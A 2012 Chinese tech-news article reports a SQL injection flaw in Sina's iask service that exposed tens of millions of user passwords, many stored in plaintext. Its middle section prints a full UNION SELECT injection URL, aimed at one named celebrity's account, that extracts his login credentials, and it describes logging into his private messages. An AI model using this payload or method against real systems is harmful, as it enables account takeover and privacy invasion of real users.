网络安全 频道

新浪微博爆密码泄露漏洞 仍有明文密码

  【IT168 资讯】1月5日消息,元旦刚过,发生在2011年末的“泄密门”事件(点击这里回顾泄密门事件)刚刚沉默了两天,今天又爆出新浪微博存在密码泄漏漏洞。据游侠安全网发布的消息称,新浪网iask存在SQL注入漏洞,利用该漏洞黑客可读取iask数据库的内容,包括明文密码在内的7000多万新浪用户信息。据悉,新浪目前已经修复了此漏洞。

  据游侠给出的质疑表示,新浪在csdn、天涯等用户库泄露后申称新浪数据库并没有泄露,而且密码是密文保存。这里要提出质疑了,数据库密码明明是明文保存。至少iask中大部分用户是明文保存密码(部分用户查不到密码)。至于用户信息是否泄露,这个不用说了把?

  这里演示通过新浪微博获取刘谦的微博账号和密码:

  1、点击刘谦的个人资料,我们可以在浏览器地址栏处看到刘谦的uid(新浪用户数字id),此处uid为12715428867;

新浪微博爆密码泄漏漏洞 仍有明文密码
▲上图为刘谦的微博页面

  2、直接构造地址:

http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--

  3、直接获得刘谦的账号和密码:

新浪微博爆密码泄漏漏洞 仍有明文密码
▲这里账号是luchenmagic密码为2lo*****(保密)

  4、尝试登录:

新浪微博爆密码泄漏漏洞 仍有明文密码
▲登录成功,这里可以看到刘谦的各种私信、聊天记录之类

  接下来的事情你可以自由发挥了,但是对于一个黑客而言,这只不过是一个开始而已。

  回顾这段时间以来所有网站泄密事件,国内各大网站几乎无一幸免,作为中国的互联网用户,这段时间大家都很无奈的选择了改密码改到手软。但是,改了密码以后就安全了吗?在防止数据泄漏方面,作为一名互联网用户,能做的也就这样了,更多的责任还是要靠网站本身加强安全防范措施。但目前,大多数的网站安全意识非常淡薄,也没有专门的安全管理人员,安全投入也很少。这次的数据泄漏事件给所有的互联网公司、用户以及安全厂商于警示。未来要如何做,让我们拭目以待!

  注:本文新闻素材来源于游侠安全网,在此特别感谢游侠的支持!点击这里查看来源:http://www.youxia.org/2012/01/2012-SINA-weibo-user-password-lose.html

0
相关文章